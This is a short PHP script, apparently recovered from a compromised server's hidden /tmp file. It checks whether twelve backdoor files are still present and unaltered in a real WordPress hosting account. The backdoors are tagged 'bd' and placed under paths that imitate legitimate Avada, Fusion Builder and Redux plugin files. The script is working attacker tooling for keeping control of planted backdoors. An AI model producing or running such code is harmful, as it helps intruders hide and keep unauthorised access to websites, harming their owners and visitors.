File: //tmp/.binding
<?php $r = '/home/lpenergy/public_html'; $x = ["/oldsite/wp-content/plugins/fusion-builder/inc/lib/inc/redux/framework/FusionReduxCore/inc/validation/unique_slug/validation.unique.slug.php"=>"bd@@47904@@913",
"/wp-content/plugins/security_1778952173/post-1778952173.php"=>"bd@@104252@@927",
"/oldsite/wp-content/themes/Avada/includes/lib/inc/redux/framework/FusionReduxCore/inc/validation/preg_replace/validation.preg.replace.php"=>"bd@@48469@@956",
"/oldsite/wp-content/plugins/fusion-builder/inc/lib/inc/redux/framework/FusionReduxCore/inc/fields/info/field.info.php"=>"bd@@74351@@917",
"/wp-content/plugins/gallery-1778685704/libs/comment_section_1778685706.php"=>"bd@@40072@@885",
"/oldsite/wp-content/plugins/really-simple-ssl/lets-encrypt/vendor/plesk/api-php-lib/src/Api/Struct/SecretKey/weblink.php"=>"bd@@48781@@1024",
"/oldsite/wp-content/themes/Avada/includes/lib/inc/redux/framework/FusionReduxCore/inc/fields/divide/field.divide.php"=>"bd@@74675@@855",
"/wp-content/plugins/fusion-builder/inc/lib/inc/redux/framework/FusionReduxCore/inc/validation/unique_slug/validation.unique.slug.php"=>"bd@@50127@@1093",
"/oldsite/wp-content/themes/Avada/includes/lib/inc/redux/framework/FusionReduxCore/inc/fields/raw/parsedown.raw.php"=>"bd@@75217@@982",
"/wp-content/plugins/fusion-builder/inc/lib/inc/redux/framework/FusionReduxCore/inc/fields/select/field.icons.php"=>"bd@@49114@@995",
"/wp-content/themes/Avada/includes/lib/inc/redux/framework/FusionReduxCore/inc/validation/not_empty/validation.not.empty.php"=>"bd@@76003@@1056",
"/wp-content/themes/Avada/includes/lib/inc/redux/framework/FusionReduxCore/inc/validation/html_custom/validation.html.custom.php"=>"bd@@75756@@1011"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');